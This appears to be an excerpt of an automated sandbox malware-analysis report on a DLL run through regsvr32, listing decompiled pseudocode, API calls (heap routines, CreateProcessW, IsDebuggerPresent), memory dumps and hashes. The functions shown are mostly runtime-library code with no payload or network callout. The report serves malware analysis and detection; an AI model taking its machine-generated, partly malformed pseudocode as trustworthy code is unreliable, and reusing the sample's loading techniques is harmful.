Function 00007FFA0AE6A9DC Relevance: 3.0, APIs: 2, Instructions: 19
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E00007FFA7FFA0AE6A9DC(intOrPtr* __rax, void* __rcx) {
				int _t1;
				intOrPtr _t3;
				void* _t4;
				void* _t11;
				intOrPtr _t14;

				if (__rcx == 0) goto 0xae6aa17;
				_t14 =  *0xaedf930; // 0x540000, executed
				_t1 = HeapFree(_t11, ??); // executed
				if (_t1 != 0) goto 0xae6aa12;
				_t3 = E00007FFA7FFA0AE6B34C(GetLastError(), __rax, _t14, __rcx);
				_t4 = E00007FFA7FFA0AE6B420(__rax);
				 *__rax = _t3;
				return _t4;
			}

0x7ffa0ae6a9df
0x7ffa0ae6a9eb
0x7ffa0ae6a9f2
0x7ffa0ae6a9fa
0x7ffa0ae6aa04
0x7ffa0ae6aa0b
0x7ffa0ae6aa10
0x7ffa0ae6aa17

APIs

RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFA0AE6F492,?,?,?,00007FFA0AE6F4CF,?,?,00000000,00007FFA0AE6F144,?,?,?,00007FFA0AE6F077), ref: 00007FFA0AE6A9F2
GetLastError.KERNEL32(?,?,00000000,00007FFA0AE6F492,?,?,?,00007FFA0AE6F4CF,?,?,00000000,00007FFA0AE6F144,?,?,?,00007FFA0AE6F077), ref: 00007FFA0AE6A9FC

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: ErrorLastPrivilegeRelease
String ID:
API String ID: 1334314998-0
Opcode ID: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
Instruction ID: 1dc2012048c57834dbf89f6a0a3c98f1380f3016787cd9640d87fc6890232cc3
Opcode Fuzzy Hash: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
Instruction Fuzzy Hash: 6BE08622F0921243FF087BF2F44403812909F47B80F44C8B4C80D97261FE3C6C454244

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800284B0 Relevance: 1.6, APIs: 1, Instructions: 121processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 000000018002867E

Memory Dump Source

Source File: 00000003.00000002.315217709.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE622B0 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00007FFA7FFA0AE622B0(long long __rax, long long __rcx, long long __rdx, long long _a8, long long _a16, signed char _a24) {
				long long _v16;
				signed char _v24;
				intOrPtr* _t48;
				intOrPtr* _t50;

				_t48 = __rax;
				_a24 = r8b;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFA7FFA0AE62830(__rax, _a8);
				if (_t48 - _a16 >= 0) goto 0xae622de;
				E00007FFA7FFA0AE62230(_a8);
				E00007FFA7FFA0AE62150(_t48, _a8);
				if ( *_t48 - _a16 >= 0) goto 0xae62310;
				E00007FFA7FFA0AE62170(_t48, _a8);
				E00007FFA7FFA0AE62600(_a8, _a16,  *_t48); // executed
				goto 0xae6237a;
				if ((_a24 & 0x000000ff) == 0) goto 0xae62366;
				if (_a16 - 0x10 >= 0) goto 0xae62366;
				E00007FFA7FFA0AE62170(_t48, _a8);
				if (_a16 -  *_t48 >= 0) goto 0xae62341;
				_t50 = _a16;
				_v16 = _t50;
				goto 0xae62353;
				E00007FFA7FFA0AE62170(_t50, _a8);
				_v16 =  *_t50;
				E00007FFA7FFA0AE61910(1,  *_t50, _a8, _v16);
				goto 0xae6237a;
				if (_a16 != 0) goto 0xae6237a;
				E00007FFA7FFA0AE623A0( *_t50, _a8, _a16);
				if (_a16 <= 0) goto 0xae6238c;
				_v24 = 1;
				goto 0xae62394;
				_v24 = 0;
				return _v24 & 0x000000ff;
			}

APIs

Part of subcall function 00007FFA0AE62830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE6283E
Part of subcall function 00007FFA0AE62830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFA0AE6284B

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE622D9

Part of subcall function 00007FFA0AE62170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE6217E

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::$EmptyQueue::StructuredWork$Base::BridgeDispatchMtx_guardMtx_guard::~_SchedulerThrottler
String ID:
API String ID: 1903167320-0
Opcode ID: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
Instruction ID: 79af48ee9c3734f0239ce58a1dae39387a3090d5d4abc403722913dd1f690087
Opcode Fuzzy Hash: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
Instruction Fuzzy Hash: C521CF33D0CA5281DA10AB25F4503AEAB70FBC67C4F608875E78D476A9EF3DD5508B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE7060C Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FFA7FFA0AE7060C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (__ecx - 0x2000 < 0) goto 0xae70654;
				E00007FFA7FFA0AE6B420(__rax);
				 *__rax = 9;
				E00007FFA7FFA0AE69744();
				return 9;
			}

0x7ffa0ae7060c
0x7ffa0ae70611
0x7ffa0ae70616
0x7ffa0ae70629
0x7ffa0ae7062b
0x7ffa0ae70635
0x7ffa0ae70637
0x7ffa0ae70653

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFA0AE70637

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9630306cbb1685fa6066e691d321c691ce288c67f2e3b59aeca8e9753d6d96fe
Instruction ID: 0475a4c49584115bd18a9d0f54cf034c924eaf9f2bf986739794d9ea31bba3d7
Opcode Fuzzy Hash: 9630306cbb1685fa6066e691d321c691ce288c67f2e3b59aeca8e9753d6d96fe
Instruction Fuzzy Hash: 1711827391866286F710FB64F49097D63A0EB82744F1585B4E64D4BB92FF3CE8108B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6AAD0 Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA0AE6AAD0(void* __eax, signed int __rcx, signed int __rdx) {
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0xae6aaef;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0xae6ab32;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0xae6ab16;
				if (E00007FFA7FFA0AE6E958() == 0) goto 0xae6ab32;
				if (E00007FFA7FFA0AE697EC(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0xae6ab32;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0xae6ab01;
				goto 0xae6ab3f;
				E00007FFA7FFA0AE6B420(_t22);
				 *_t22 = 0xc;
				return 0;
			}

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FFA0AE6BAAE,?,?,?,00007FFA0AE6B429,?,?,?,?,00007FFA0AE70426,?,?,00000000), ref: 00007FFA0AE6AB25

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
Instruction ID: aa872346bc4264b70d333165019709248f038d693b4a3183def092d8cff0e99c
Opcode Fuzzy Hash: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
Instruction Fuzzy Hash: 6CF06D26F0A22341FE587B72F5112B503A65F66BC4F8CC8B0C80E973D2FE2CE8818210

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6AA18 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA0AE6AA18(intOrPtr* __rax, void* __rcx) {

				if (__rcx - 0xffffffe0 > 0) goto 0xae6aa63;
				_t16 =  ==  ? __rax : __rcx;
				goto 0xae6aa4a;
				if (E00007FFA7FFA0AE6E958() == 0) goto 0xae6aa63;
				if (E00007FFA7FFA0AE697EC(__rax,  ==  ? __rax : __rcx) == 0) goto 0xae6aa63;
				RtlAllocateHeap(??, ??, ??); // executed
				if (__rax == 0) goto 0xae6aa35;
				goto 0xae6aa70;
				E00007FFA7FFA0AE6B420(__rax);
				 *__rax = 0xc;
				return 0;
			}

0x7ffa0ae6aa25
0x7ffa0ae6aa2f
0x7ffa0ae6aa33
0x7ffa0ae6aa3c
0x7ffa0ae6aa48
0x7ffa0ae6aa56
0x7ffa0ae6aa5f
0x7ffa0ae6aa61
0x7ffa0ae6aa63
0x7ffa0ae6aa68
0x7ffa0ae6aa75

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FFA0AE7040D,?,?,00000000,00007FFA0AE6D8B7,?,?,?,00007FFA0AE6A427,?,?,?,00007FFA0AE6A31D), ref: 00007FFA0AE6AA56

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
Instruction ID: cce6075672c27983d6454db0b77a829ab80cdaf655d3b6ac7c8975b15052a24b
Opcode Fuzzy Hash: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
Instruction Fuzzy Hash: 03F05E23E0D22345FE547771FA4127552A04F46BE0F08DAB1D82E972C2FE2CA4414620

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE61B10 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00007FFA7FFA0AE61B10(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
				void* _t7;
				void* _t8;

				_t8 = __rax;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFA7FFA0AE611A0(_a16);
				_t7 = E00007FFA7FFA0AE61B40(_t8, _a8, _a16, _t8); // executed
				return _t7;
			}

0x7ffa0ae61b10
0x7ffa0ae61b10
0x7ffa0ae61b15
0x7ffa0ae61b23
0x7ffa0ae61b35
0x7ffa0ae61b3e

APIs

char_traits.LIBCPMTD ref: 00007FFA0AE61B23

Part of subcall function 00007FFA0AE61B40: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61B6E

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Base::Concurrency::details::ContextIdentityQueueWorkchar_traits
String ID:
API String ID: 1444011685-0
Opcode ID: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
Instruction ID: a022f4f31560b5cfe9e47972ca4596583b7e8d7abbc798dce80efc490efee180
Opcode Fuzzy Hash: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
Instruction Fuzzy Hash: 5BD09E76929A8181D544FB22F89105AA760EBD57C0F409575FA8E83B2AEE28C1514B00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFA0AE69474 Relevance: 9.1, APIs: 6, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00007FFA7FFA0AE69474(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* _t36;
				int _t40;
				void* _t45;
				intOrPtr _t53;
				signed long long _t63;
				long long _t66;
				_Unknown_base(*)()* _t86;
				void* _t90;
				void* _t91;
				void* _t93;
				signed long long _t94;
				struct _EXCEPTION_POINTERS* _t100;

				_t46 = __ecx;
				 *((long long*)(_t93 + 0x10)) = __rbx;
				 *((long long*)(_t93 + 0x18)) = __rsi;
				_t91 = _t93 - 0x4f0;
				_t94 = _t93 - 0x5f0;
				_t63 =  *0xaede008; // 0x81ced31fdcd6
				 *(_t91 + 0x4e0) = _t63 ^ _t94;
				_t53 = r8d;
				_t45 = __ecx;
				if (__ecx == 0xffffffff) goto 0xae694b3;
				E00007FFA7FFA0AE6493C(_t36);
				r8d = 0x98;
				E00007FFA7FFA0AE66920(__ecx, 0, _t53, __esp, _t94 + 0x70, __rdx, _t86, __r8);
				r8d = 0x4d0;
				E00007FFA7FFA0AE66920(_t46, 0, _t53, __esp, _t91 + 0x10, __rdx, _t86, __r8);
				 *((long long*)(_t94 + 0x48)) = _t94 + 0x70;
				_t66 = _t91 + 0x10;
				 *((long long*)(_t94 + 0x50)) = _t66;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t66 == 0) goto 0xae69546;
				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
				 *((long long*)(_t94 + 0x30)) = _t94 + 0x58;
				 *((long long*)(_t94 + 0x28)) = _t94 + 0x60;
				 *((long long*)(_t94 + 0x20)) = _t91 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
				 *((long long*)(_t91 + 0xa8)) = _t91 + 0x510;
				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
				 *((intOrPtr*)(_t94 + 0x74)) = _t53;
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t86, _t90);
				if (UnhandledExceptionFilter(_t100) != 0) goto 0xae695a8;
				if (_t40 != 0) goto 0xae695a8;
				if (_t45 == 0xffffffff) goto 0xae695a8;
				return E00007FFA7FFA0AE63A70(E00007FFA7FFA0AE6493C(_t42), _t45, 0,  *(_t91 + 0x4e0) ^ _t94);
			}

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFA0AE694ED
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFA0AE69505
RtlVirtualUnwind.KERNEL32 ref: 00007FFA0AE69540
IsDebuggerPresent.KERNEL32 ref: 00007FFA0AE69579
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFA0AE69583
UnhandledExceptionFilter.KERNEL32 ref: 00007FFA0AE6958E

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
Instruction ID: 7803840f8c7aa219f5defa0f29590e20cacc5bfb64f1ec51faf45a1fd5d28000
Opcode Fuzzy Hash: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
Instruction Fuzzy Hash: D2317F33618B9186E7609B35F8503AE73A4FB86794F508535EA8D43B95EF3CC555CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE63240 Relevance: 55.8, APIs: 37, Instructions: 252
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00007FFA7FFA0AE63240(void* __edx, void* __eflags, long long __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40, long long _a48) {
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				long long _v112;
				long long _v120;
				long long _v128;
				long long _v136;
				long long _t207;
				intOrPtr* _t209;
				intOrPtr _t218;
				intOrPtr _t221;
				long long _t223;
				void* _t225;
				intOrPtr _t228;
				long long _t229;
				void* _t230;
				intOrPtr _t235;
				long long _t237;
				void* _t239;
				void* _t243;
				long long _t245;
				void* _t247;
				long long _t248;
				void* _t249;
				long long _t250;
				void* _t251;
				long long _t257;

				_t207 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFA7FFA0AE621F0(__eflags, __rax, _a8, _a16);
				E00007FFA7FFA0AE621F0(__eflags, __rax, _a32, _a40);
				E00007FFA7FFA0AE62400(__eflags, __rax, _a8, _a16, _a24);
				_a24 = _t207;
				E00007FFA7FFA0AE62400(__eflags, _t207, _a32, _a40, _a48);
				_a48 = _t207;
				_t209 = 0xffffffff - _a48;
				_v120 = 0xffffffff;
				E00007FFA7FFA0AE62170(_t209, _a8);
				_t211 =  *_t209 - _a24;
				if (_v120 - 0xffffffff > 0) goto 0xae63315;
				E00007FFA7FFA0AE62230(_a8);
				E00007FFA7FFA0AE62170( *_t209 - _a24, _a8);
				_v136 = 0xffffffff;
				E00007FFA7FFA0AE62170( *_t211 - _a24 - _a16, _a8);
				_v128 = 0xffffffff;
				E00007FFA7FFA0AE62170( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8);
				if ( *0xffffffff - _v128 >= 0) goto 0xae6338e;
				r8d = 0;
				E00007FFA7FFA0AE622B0( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8, _v128);
				_t218 = _a24;
				if (_a48 != _t218) goto 0xae633ec;
				E00007FFA7FFA0AE618D0(_t218, _a32);
				_v112 = _t218 + _a40;
				E00007FFA7FFA0AE618F0(_t218 + _a40, _a8);
				E00007FFA7FFA0AE61230(_t218 + _a40 + _a16, _v112, _a48);
				goto 0xae63810;
				_t221 = _a32;
				if (_a8 == _t221) goto 0xae634a2;
				E00007FFA7FFA0AE618F0(_t221, _a8);
				_t223 = _t221 + _a16 + _a24;
				_v104 = _t223;
				E00007FFA7FFA0AE618F0(_t223, _a8);
				_t225 = _t223 + _a16 + _a48;
				E00007FFA7FFA0AE61230(_t225, _v104, _v136);
				E00007FFA7FFA0AE618D0(_t225, _a32);
				_v96 = _t225 + _a40;
				E00007FFA7FFA0AE618F0(_t225 + _a40, _a8);
				E00007FFA7FFA0AE611E0(_t225 + _a40 + _a16, _v96, _a48);
				goto 0xae63810;
				_t228 = _a24;
				if (_a48 - _t228 >= 0) goto 0xae63558;
				E00007FFA7FFA0AE618F0(_t228, _a8);
				_t229 = _t228 + _a40;
				_v88 = _t229;
				E00007FFA7FFA0AE618F0(_t229, _a8);
				_t230 = _t229 + _a16;
				E00007FFA7FFA0AE61230(_t230, _v88, _a48);
				E00007FFA7FFA0AE618F0(_t230, _a8);
				_v80 = _t230 + _a16 + _a24;
				E00007FFA7FFA0AE618F0(_t230 + _a16 + _a24, _a8);
				E00007FFA7FFA0AE61230(_t230 + _a16 + _a24 + _a16 + _a48, _v80, _v136);
				goto 0xae63810;
				_t235 = _a16;
				if (_a40 - _t235 > 0) goto 0xae6360e;
				E00007FFA7FFA0AE618F0(_t235, _a8);
				_t237 = _t235 + _a16 + _a24;
				_v72 = _t237;
				E00007FFA7FFA0AE618F0(_t237, _a8);
				_t239 = _t237 + _a16 + _a48;
				E00007FFA7FFA0AE61230(_t239, _v72, _v136);
				E00007FFA7FFA0AE618F0(_t239, _a8);
				_v64 = _t239 + _a40;
				E00007FFA7FFA0AE618F0(_t239 + _a40, _a8);
				E00007FFA7FFA0AE61230(_t239 + _a40 + _a16, _v64, _a48);
				goto 0xae63810;
				_t243 = _a16 + _a24;
				if (_t243 - _a40 > 0) goto 0xae636eb;
				E00007FFA7FFA0AE618F0(_t243, _a8);
				_t245 = _t243 + _a16 + _a24;
				_v56 = _t245;
				E00007FFA7FFA0AE618F0(_t245, _a8);
				_t247 = _t245 + _a16 + _a48;
				E00007FFA7FFA0AE61230(_t247, _v56, _v136);
				E00007FFA7FFA0AE618F0(_t247, _a8);
				_t248 = _t247 + _a40 + _a48 - _a24;
				_v48 = _t248;
				E00007FFA7FFA0AE618F0(_t248, _a8);
				_t249 = _t248 + _a16;
				E00007FFA7FFA0AE61230(_t249, _v48, _a48);
				goto 0xae63810;
				E00007FFA7FFA0AE618F0(_t249, _a8);
				_t250 = _t249 + _a40;
				_v40 = _t250;
				E00007FFA7FFA0AE618F0(_t250, _a8);
				_t251 = _t250 + _a16;
				E00007FFA7FFA0AE61230(_t251, _v40, _a24);
				E00007FFA7FFA0AE618F0(_t251, _a8);
				_v32 = _t251 + _a16 + _a24;
				E00007FFA7FFA0AE618F0(_t251 + _a16 + _a24, _a8);
				E00007FFA7FFA0AE61230(_t251 + _a16 + _a24 + _a16 + _a48, _v32, _v136);
				_t257 = _a48 - _a24;
				_v24 = _t257;
				E00007FFA7FFA0AE618F0(_t257, _a8);
				_t259 = _t257 + _a40 + _a48;
				_v16 = _t257 + _a40 + _a48;
				E00007FFA7FFA0AE618F0(_t257 + _a40 + _a48, _a8);
				E00007FFA7FFA0AE61230(_t259 + _a16 + _a24, _v16, _v24);
				return E00007FFA7FFA0AE623A0(_t259 + _a16 + _a24, _a8, _v128);
			}

APIs

Part of subcall function 00007FFA0AE621F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE62217

Part of subcall function 00007FFA0AE62170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE6217E

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE63310
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE633A8
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE633C2
char_traits.LIBCPMTD ref: 00007FFA0AE633E2
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6342C
char_traits.LIBCPMTD ref: 00007FFA0AE63451
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6345E

Part of subcall function 00007FFA0AE618D0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE618DE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE63478
char_traits.LIBCPMTD ref: 00007FFA0AE63498
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6340A

Part of subcall function 00007FFA0AE618F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE618FE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE634C0
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE634DA
char_traits.LIBCPMTD ref: 00007FFA0AE634FA
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE63507
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE63529
